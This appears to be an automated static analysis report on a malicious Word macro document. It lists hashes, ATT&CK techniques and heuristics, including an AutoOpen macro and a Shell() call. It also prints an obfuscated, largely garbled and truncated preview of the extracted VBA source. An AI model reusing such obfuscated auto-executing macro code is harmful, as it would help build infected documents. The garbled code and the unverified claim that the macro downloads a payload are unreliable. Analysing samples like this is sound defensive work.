Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f8d7943ed797926c…

MALICIOUS

Office (OLE)

Size: 182.0 KB
Created: 2018-04-26 07:10:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 5a0c6e031e662d64c7617dec59d8e65e
SHA-1: 0e04cb63dd1bfe0bdb8580739c5be7e1602c0369
SHA-256: f8d7943ed797926cbf0c9e7fd38fd92179539dcc8e3c79ce56416f5fa738fdd8
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The critical heuristic firing indicates a Shell() call within the VBA, suggesting the macro is intended to execute arbitrary commands. The presence of an AutoOpen macro further supports this, as it automatically runs upon document opening. The macro's obfuscated nature and truncated script prevent a definitive analysis of its exact payload, but the overall intent is to download and execute a secondary malicious file.

Heuristics 5

  • VBA macros detected (severity: medium; 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (severity: high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 183820 bytes
SHA-256: da1136182d74715a5eadd07dc7b4b650b9f9e692e3b7a729d10fb86a0c3b7781

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "fzcJdPKQGBU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creata`le = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customiza`le = True
Sub qdspn(tkPEw)
Select Case GUNGw
         Case 79172
            iAdSb = Hex(tRYVka - ChrW(TAUnO))
            jijzj = CByte(66305)
            CkQrDO = QdPNK
         Case 32411
            uuUPf = drGAZs
            IpzCwk = Round(54408)
            IAhSVN = Log(nkGdz)
End Select
End Sub
Sub lnMiBE(LdQRK)
Select Case EaiNQZ
         Case 78002
            mtnzJP = Hex(EVtvv - ChrW(WBlTvf))
            PijPH = CByte(88727)
            dEXqD = OzuYk
         Case 84700
            wGIXVP = iZztUt
            VHJXqP = Round(12120)
            zzCrmY = Log(HMiDq)
End Select
Select Case IWMtr
         Case 11096
            EHiVJb = Hex(skAuci - ChrW(HKUdd))
            LRkKR = CByte(6615)
            Mkzdw = frsTh
         Case 65157
            fdWMo = HJBMrP
            qPmWT = Round(7432)
            DjHmW = Log(TDIOqnX"SjiuYnd(121hrW(TAUnO))
  27)
2           wGIXVP = iZztUld Sub08002
            mtnzJP = H hWWlv)
      PjHe    QFt
End Sub
zF"End Sub
Sub lnMiBE(LdQRK)
Skp          Case 65157
Em            wGIXVP = iZzt  !cskAuc83�"GH hWWlv)
         CkQrDO = QdPNKzM pVj jXVP = iZztUt 4 = CByte(6615)
     9ƒ CByte(6615
 nDqJZzt t Case EaiNQZ
ect
Select Casee IWMtr
     r IWMtr
         CaY)
    `d = TrT = R8891nd Sub
Sub lnMMjNXCQ = K)
RdmDj       Case 651qD = OzuYk
 GQztiu(mVUjOS   7
         TdzfiO        CaYt  !c48428        CaY)
EpVose(66CkQrEZHD= QdPNKzM OiYHvBVP = iZztUt 4 = OjIjnz = 15)
 7763t Case IWMtr
  HYRFSzt tXqBud))
       t  !c2elec83�"GH hWWlv)
ZLTzs
SeHXTXuuUPf = drGA
  JNFFGe(66TrT = 2
6t Case IWMtr
  jltK
SeK)
HiFAH       Case 6517
         SHwPoF        CaYt  !c49908        CaY)
zAwiV = CkQrwKkwoQdPNKzM odqaZpVP = iZztUt 4 = HLYSTKR =15)
 4092End Sub
Sub lnMBQpQ
  NSimLolec83�"GH hWWlv)85364ub lnMBQpQ
  CwzIMSGA
oQWqzcNSimLolec83�"GCbhfWlv) K)
R1186   b l  b l  b wuvjmLSubk
 LHnOAkiu(mVUjOS   7
 Mkzdw = frsTAutoopen(iu(On Error Resive Nexd))7
         ObKGz = iZztUld Sub0800753  Case 78002
 tzRZLLSubCkQrBHtntLQdPNKzM CcZHMVP = iZztUt 4 = JjbwrUSub15)
 7621t Case IWMtr
  WYUSKR =AwONzNSimLolec83t  !c2973            mtnGfUMrSubkYihpVNSimLolec83�"GcKXTiSub K)
R83163iu(b l  b l  b qijYV = k
 ACFNLH       Case 651TwAnpriVPuCRCS (ICDHlz + AInfKjatEJwj + cbori
   7
         jpZufNSimLolec83t  !c1605iVJb = Hex(skAuicwvrzt tCkQrITUViXQdPNKzM ZHPhiJVP = iZztUt 4 = PqsuXV = 15)
 31616   b l  b l  b jSfzFSubaGLunuNSimLolec83t  !c371   Case 78002
 TVwZLSubiJNzuuUPf = drGA
  OmEBUrSub K)
Rct 89ƒ CByte(6615
 mCpiS
Enk
 ADnvOciu( Mkzd1
  EXqD = OzuYk
 WWzzJ(iXFiAiu(7
         PoCKwGIXVP = iZztUt
91044ub lnMBQpQ
  CXVRf
SeH408rKhFZQdPNKzM jTGPhVP = iZztUt 4 = WhPRKR =15)
 9   t Case IWMtr
  hIEL  wGNzqEmF        CaYt  !c8368iVJb = Hex(skAupSvzS    RpIYUGNSimLolec83b lNIGGUSub K)
Rc5896   b l  b l  b wnziLzt tk
 tPUJ       Case 65157

        hPTUzNSimLolec83t  !c   9Casee IWMtr
  QTvmimSubCkQrmhwjkQdPNKzM CqfwOVP = iZztUt 4 = TdXanSub15)
 2el95)
            mVzol IWMwQfrMNSimLolec83t  !c9195NSimLolec83b lBQMQ= H WRqkXNSimLolec83b lqzwstSub K)
R14968iu(b l  b l  b zzoosSubk
 XjXmLiu( Mkzd1
  EX7
         kJjRNLNSimLolec83t  !c19698        CaY)
pHVfN121hCkQrSGwXljQdPNKzM EZNbTDVP = iZztUt 4 = sziiz = 15)
 75193iu(b l  b l  b KjljiISubsiJba = iZztUld Sub080958        VHJXqP YOZDve(66ElsH = iZztUld Sb lIqAPiiSub K)
R15536iu(b l  b l  b NrCb Selk
 vDzsViu( Mkzd1
  EX MkzdOzuYk
 RaQEt(sCczobiu(7
         kjnILuuUPf = drGAt  !c9749        VHJXqP BLXXcnSubCkQrMAlzlVQdPNKzM hawWmqVP = iZztUt 4 = wNCbASub15)
 44436   b l  b l  b HuowWKR =OshQENSimLolec83t  !c694ub lnMBQpQ
  CcNpqFe(66NMpJe EaiNQZ
ectb lEzUvbQ =  K)
R29694iu(b lb lb lb lGzCOFSubk
 ShOFiiu( Mkzd1
  EX MkzdOzuY
Attribute VB_Name = "OUzNkvSathznO"
Sub MRYlp(klWQnb)
Select Case p
... (truncated)